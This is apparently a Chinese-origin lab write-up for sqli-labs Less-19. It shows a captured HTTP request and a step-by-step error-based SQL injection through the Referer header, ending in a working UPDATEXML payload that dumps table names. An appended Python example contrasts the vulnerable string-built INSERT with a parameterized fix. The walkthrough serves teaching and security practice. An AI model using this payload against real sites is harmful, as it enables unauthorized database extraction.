Less-19
- With the experience from Less-18, this one is fairly simple.
- Capture the request with Burp Suite and send it directly.
```
POST /Less-19/ HTTP/1.1
Host: sql.alienwares.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://sql.alienwares.top
Connection: close
Referer: asa'ddd#
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit
```
```
You have an error in your SQL syntax;...version for the right syntax to use near 'ddd#', '117.188.186.53')' at line 1
```
- The response returns a MySQL error.
- So the MySQL statement should have the form
```sql
insert into table_name values ('a','b')
```
- Start constructing the SQL injection statement
```sql
sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE()

concat(0x7e,sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE()) # remember to add the parentheses

select updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1)

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or 1=1,'127.0.0.1')#', '$IP')

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#', '$IP')

'or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#
```

The SQL injection is complete.
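The fix for this class of bug, as an added example that is not part of the original post or the lab's code: the Referer header is bound as a parameter instead of being interpolated into the `INSERT`, and driver errors are no longer echoed to the client. It assumes Python's `sqlite3` as a stand-in for the lab's PHP/MySQL stack; the function names and the `referers` table created here are hypothetical.

```python
import sqlite3

# Constructed sample values: the Referer header from the request shown above.
SAMPLE_REFERER = "asa'ddd#"
SAMPLE_IP = "127.0.0.1"


def make_db():
    """In-memory stand-in for the `referers` table (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE referers (referer TEXT, ip_address TEXT)")
    return db


def log_referer_vulnerable(db, referer, ip):
    """Builds the INSERT by string interpolation and echoes DB errors."""
    sql = f"INSERT INTO referers (referer, ip_address) VALUES ('{referer}', '{ip}')"
    try:
        db.execute(sql)
        return "ok"
    except sqlite3.Error as exc:
        # Echoing the driver error to the client is what makes
        # error-based extraction possible.
        return f"error: {exc}"


def log_referer_hardened(db, referer, ip):
    """Binds the header as a parameter and never returns driver errors."""
    try:
        db.execute(
            "INSERT INTO referers (referer, ip_address) VALUES (?, ?)",
            (referer, ip),
        )
        return "ok"
    except sqlite3.Error:
        # Details belong in server-side logs, not in the HTTP response.
        return "error: request could not be logged"


def stored_referers(db):
    """Returns every logged Referer value, in insertion order."""
    return [row[0] for row in db.execute("SELECT referer FROM referers")]
```

With the vulnerable function the quote in the header ends the string literal and the database error comes back to the caller; with the hardened one the same header is stored verbatim as data.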